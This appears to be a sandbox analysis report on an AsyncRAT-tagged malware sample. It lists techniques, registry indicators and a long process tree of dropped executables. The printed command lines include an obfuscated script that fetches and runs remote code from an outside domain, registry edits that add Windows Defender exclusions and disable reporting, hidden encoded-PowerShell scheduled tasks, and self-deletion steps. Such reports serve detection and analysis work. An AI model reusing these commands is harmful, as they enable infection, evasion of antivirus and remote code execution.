asyncrat | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

AppLaunch.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

timeSync.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	timeSync.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	timeSync.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4144	schtasks.exe
2884	schtasks.exe
7664	schtasks.exe
3868	schtasks.exe
5772	schtasks.exe
7612	schtasks.exe
6440	schtasks.exe
7584	schtasks.exe
9596	schtasks.exe
6096	schtasks.exe
5508	schtasks.exe
5108	schtasks.exe
5884	schtasks.exe
3048	schtasks.exe
6328	schtasks.exe
9356	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3048 timeout.exe
8264 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

9040 tasklist.exe

pid	process
3048	timeout.exe
8264	timeout.exe

pid	process
9040	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3356 taskkill.exe

pid	process
3356	taskkill.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

timeSync.exeAppLaunch.exe201.exe

pid	process
3220	timeSync.exe
3220	timeSync.exe
2668	AppLaunch.exe
2668	AppLaunch.exe
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3380
3300	201.exe
3300	201.exe
3380
3380

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

AppLaunch.exe

pid process

2668 AppLaunch.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

New Text Document.exe

description pid process

Token: SeDebugPrivilege 1036 New Text Document.exe

pid	process
2668	AppLaunch.exe

description	pid	process
Token: SeDebugPrivilege	1036	New Text Document.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

New Text Document.exefoto1661.exezV6Ku8EA.exeOs1UC4HT.exeEl9Qv1Vb.exeai0tf9ss.exetus.exe1iK90Be5.exesetup.exeInstall.exe

description	pid	process	target process
PID 1036 wrote to memory of 3220	1036	New Text Document.exe	timeSync.exe
PID 1036 wrote to memory of 3220	1036	New Text Document.exe	timeSync.exe
PID 1036 wrote to memory of 3220	1036	New Text Document.exe	timeSync.exe
PID 1036 wrote to memory of 196	1036	New Text Document.exe	davincizx.exe
PID 1036 wrote to memory of 196	1036	New Text Document.exe	davincizx.exe
PID 1036 wrote to memory of 196	1036	New Text Document.exe	davincizx.exe
PID 1036 wrote to memory of 4804	1036	New Text Document.exe	foto1661.exe
PID 1036 wrote to memory of 4804	1036	New Text Document.exe	foto1661.exe
PID 1036 wrote to memory of 4804	1036	New Text Document.exe	foto1661.exe
PID 4804 wrote to memory of 3412	4804	foto1661.exe	zV6Ku8EA.exe
PID 4804 wrote to memory of 3412	4804	foto1661.exe	zV6Ku8EA.exe
PID 4804 wrote to memory of 3412	4804	foto1661.exe	zV6Ku8EA.exe
PID 3412 wrote to memory of 3116	3412	zV6Ku8EA.exe	Os1UC4HT.exe
PID 3412 wrote to memory of 3116	3412	zV6Ku8EA.exe	Os1UC4HT.exe
PID 3412 wrote to memory of 3116	3412	zV6Ku8EA.exe	Os1UC4HT.exe
PID 3116 wrote to memory of 2076	3116	Os1UC4HT.exe	El9Qv1Vb.exe
PID 3116 wrote to memory of 2076	3116	Os1UC4HT.exe	El9Qv1Vb.exe
PID 3116 wrote to memory of 2076	3116	Os1UC4HT.exe	El9Qv1Vb.exe
PID 1036 wrote to memory of 4812	1036	New Text Document.exe	tus.exe
PID 1036 wrote to memory of 4812	1036	New Text Document.exe	tus.exe
PID 1036 wrote to memory of 4812	1036	New Text Document.exe	tus.exe
PID 2076 wrote to memory of 4796	2076	El9Qv1Vb.exe	ai0tf9ss.exe
PID 2076 wrote to memory of 4796	2076	El9Qv1Vb.exe	ai0tf9ss.exe
PID 2076 wrote to memory of 4796	2076	El9Qv1Vb.exe	ai0tf9ss.exe
PID 4796 wrote to memory of 2884	4796	ai0tf9ss.exe	1iK90Be5.exe
PID 4796 wrote to memory of 2884	4796	ai0tf9ss.exe	1iK90Be5.exe
PID 4796 wrote to memory of 2884	4796	ai0tf9ss.exe	1iK90Be5.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 4812 wrote to memory of 2668	4812	tus.exe	AppLaunch.exe
PID 1036 wrote to memory of 4572	1036	New Text Document.exe	setup.exe
PID 1036 wrote to memory of 4572	1036	New Text Document.exe	setup.exe
PID 1036 wrote to memory of 4572	1036	New Text Document.exe	setup.exe
PID 2884 wrote to memory of 4568	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 4568	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 4568	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3248	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3248	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3248	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3588	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3588	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 3588	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 4572 wrote to memory of 1772	4572	setup.exe	Install.exe
PID 4572 wrote to memory of 1772	4572	setup.exe	Install.exe
PID 4572 wrote to memory of 1772	4572	setup.exe	Install.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 2884 wrote to memory of 2720	2884	1iK90Be5.exe	AppLaunch.exe
PID 4796 wrote to memory of 4884	4796	ai0tf9ss.exe	2ki485jT.exe
PID 4796 wrote to memory of 4884	4796	ai0tf9ss.exe	2ki485jT.exe
PID 4796 wrote to memory of 4884	4796	ai0tf9ss.exe	2ki485jT.exe
PID 1772 wrote to memory of 1228	1772	Install.exe	Install.exe
PID 1772 wrote to memory of 1228	1772	Install.exe	Install.exe
PID 1772 wrote to memory of 1228	1772	Install.exe	Install.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036
- C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:3048
- C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
  2⤵
  - Executes dropped EXE
  PID:196
- - C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
    3⤵
    PID:4324
- - C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\davincizx.exe"
    3⤵
    PID:3228
- C:\Users\Admin\AppData\Local\Temp\a\foto1661.exe
  "C:\Users\Admin\AppData\Local\Temp\a\foto1661.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zV6Ku8EA.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zV6Ku8EA.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Os1UC4HT.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Os1UC4HT.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:3116
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\El9Qv1Vb.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\El9Qv1Vb.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:2076
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ai0tf9ss.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ai0tf9ss.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iK90Be5.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iK90Be5.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2884
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:4568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:3248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:3588
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 568
        9⤵
        Program crash
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ki485jT.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2ki485jT.exe
        7⤵
        Executes dropped EXE
        
        PID:4884
- C:\Users\Admin\AppData\Local\Temp\a\tus.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tus.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:2668
- C:\Users\Admin\AppData\Local\Temp\a\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Users\Admin\AppData\Local\Temp\7zSE53F.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1772
- C:\Users\Admin\AppData\Local\Temp\a\201.exe
  "C:\Users\Admin\AppData\Local\Temp\a\201.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:3300
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:1292
- C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
  "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
  2⤵
  PID:1972
- C:\Users\Admin\AppData\Local\Temp\a\kung.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
  2⤵
  PID:4852
- C:\Users\Admin\AppData\Local\Temp\a\smss.exe
  "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
  2⤵
  PID:1272
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:1320
- - C:\Users\Admin\AppData\Local\Temp\a\smss.exe
    "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"
    3⤵
    PID:5828
- C:\Users\Admin\AppData\Local\Temp\a\FX_432661.exe
  "C:\Users\Admin\AppData\Local\Temp\a\FX_432661.exe"
  2⤵
  PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c echo|set /p=^"sq048=".":r54="i":y8628="g":k4js7=":":GetO^">%Public%\bjk6l9.vbs&echo|set /p=^"bject("sCr"+r54+"pt"+k4js7+"hT"+"Tps"+k4js7+"//m4gx"+sq048+"dns04"+sq048+"com//"+y8628+"1")^">>%Public%\bjk6l9.vbs&cd c:\windows\system32\&cmd /c start %Public%\bjk6l9.vbs
    3⤵
    PID:5080
- C:\Users\Admin\AppData\Local\Temp\a\newmar.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newmar.exe"
  2⤵
  PID:4748
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:4816
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:3976
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    PID:4740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      4⤵
      PID:9100
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:10168
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:1740
  - - C:\Users\Admin\AppData\Local\Temp\7zS4E0B.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:3932
    - - C:\Users\Admin\AppData\Local\Temp\7zS53A9.tmp\Install.exe
        
        .\Install.exe /MKdidA "385119" /S
        5⤵
        
        PID:3920
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:4716
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:3372
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:4568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:3556
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:996
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:4288
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:2176
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:4880
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gZlIjLVHt" /SC once /ST 00:07:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:5108
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gZlIjLVHt"
        6⤵
        
        PID:3764
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gZlIjLVHt"
        6⤵
        
        PID:5280
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 01:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\DBgNbna.exe\" 3Y /Fosite_idreW 385119 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5884
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"
        6⤵
        
        PID:7240
- - C:\Users\Admin\AppData\Local\Temp\kos4.exe
    "C:\Users\Admin\AppData\Local\Temp\kos4.exe"
    3⤵
    PID:3572
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:5656
    - - C:\Users\Admin\AppData\Local\Temp\is-F8DM9.tmp\LzmwAqmV.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-F8DM9.tmp\LzmwAqmV.tmp" /SL5="$302DA,6114373,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        5⤵
        
        PID:5812
      - C:\Program Files (x86)\DVD and CD Tools\yDVDTools.exe
        
        "C:\Program Files (x86)\DVD and CD Tools\yDVDTools.exe" -i
        6⤵
        
        PID:5936
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "Y1025-3"
        6⤵
        
        PID:5904
      - C:\Program Files (x86)\DVD and CD Tools\yDVDTools.exe
        
        "C:\Program Files (x86)\DVD and CD Tools\yDVDTools.exe" -s
        6⤵
        
        PID:5124
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Query
        6⤵
        
        PID:5188
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    PID:4744
- C:\Users\Admin\AppData\Local\Temp\a\snow.exe
  "C:\Users\Admin\AppData\Local\Temp\a\snow.exe"
  2⤵
  PID:2940
- - C:\Users\Admin\AppData\Local\Temp\a\snow.exe
    "C:\Users\Admin\AppData\Local\Temp\a\snow.exe"
    3⤵
    PID:5500
- C:\Users\Admin\AppData\Local\Temp\a\2.exe
  "C:\Users\Admin\AppData\Local\Temp\a\2.exe"
  2⤵
  PID:1416
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1052
    3⤵
    - Program crash
    PID:4688
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1112
    3⤵
    - Program crash
    PID:2268
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1268
    3⤵
    - Program crash
    PID:3940
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1368
    3⤵
    - Program crash
    PID:3844
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1360
    3⤵
    - Program crash
    PID:5208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1040
    3⤵
    - Program crash
    PID:5324
- C:\Users\Admin\AppData\Local\Temp\a\nalo.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nalo.exe"
  2⤵
  PID:4156
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3228
- C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe"
  2⤵
  PID:1312
- - C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe"
    3⤵
    PID:6328
- - C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\texaszx.exe"
    3⤵
    PID:6384
- C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\cbchr.exe"
  2⤵
  PID:708
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 776
    3⤵
    - Program crash
    PID:880
- C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe"
  2⤵
  PID:2992
- - C:\Windows\system32\taskkill.exe
    taskkill /im chrome.exe /T /F
    3⤵
    - Kills process with taskkill
    PID:3356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\boblspsqgegf.exe
    3⤵
    PID:2548
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:516
- C:\Users\Admin\AppData\Local\Temp\a\newumma.exe
  "C:\Users\Admin\AppData\Local\Temp\a\newumma.exe"
  2⤵
  PID:4300
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    PID:1956
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:4772
- - C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    PID:3784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:1824
  - - C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
      "C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
      4⤵
      PID:7596
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:10176
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 1484
    3⤵
    - Program crash
    PID:3844
- C:\Users\Admin\AppData\Local\Temp\a\ca.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ca.exe"
  2⤵
  PID:4792
- C:\Users\Admin\AppData\Local\Temp\a\fra.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fra.exe"
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 764
    3⤵
    - Program crash
    PID:5172
- C:\Users\Admin\AppData\Local\Temp\a\bus50.exe
  "C:\Users\Admin\AppData\Local\Temp\a\bus50.exe"
  2⤵
  PID:1864
- - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\oQ0cY89.exe
    C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\oQ0cY89.exe
    3⤵
    PID:3204
  - - C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hF9ut19.exe
      C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hF9ut19.exe
      4⤵
      PID:4696
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\JO7tI75.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\JO7tI75.exe
        5⤵
        
        PID:656
      - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\eO6Of97.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\eO6Of97.exe
        6⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Wn9cX83.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\Wn9cX83.exe
        7⤵
        
        PID:808
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1QU10Eb1.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\1QU10Eb1.exe
        8⤵
        
        PID:3248
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        9⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\2kP8330.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\2kP8330.exe
        8⤵
        
        PID:2532
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        9⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\3Bb37EV.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\3Bb37EV.exe
        7⤵
        
        PID:5372
      - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\4pi011Tx.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\4pi011Tx.exe
        6⤵
        
        PID:2624
        
